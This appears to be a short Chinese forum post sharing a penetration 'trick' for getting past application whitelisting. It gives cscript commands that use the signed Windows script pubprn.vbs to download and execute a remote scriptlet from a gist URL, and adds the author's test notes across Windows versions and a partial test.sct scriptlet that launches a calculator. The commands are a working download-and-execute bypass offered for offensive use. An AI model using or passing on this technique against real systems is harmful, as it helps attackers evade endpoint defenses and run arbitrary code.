#给大家分享点具体渗透姿势,比如白名单下载恶意代码的一个技巧。
tags: #姿势#,
给大家分享点具体渗透姿势,比如白名单下载恶意代码的一个技巧。
OPCDE 里看到的一个技巧:
cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs blah "script:https://gist.githubusercontent.com/enigma0x3/64adf...
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs blah "script:https://gist.githubusercontent.com/enigma0x3/64adf...
简单说下:
第一个是英文的 Win10,第二个是中文的 Win10。test.sct 里的代码会弹个计算器。pubprn.vbs 是 Win 系统自带的,被签名过的。通过这种方式,可以 bypass 一些防御。pubprn.vbs 充当 downloader 角色。
中文,我自己实测的,据其他圈友测试 Win7/XP 都 OK。
test.sct代码如下:
<registration description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" remotable="true"
<script language="JScript"> </script>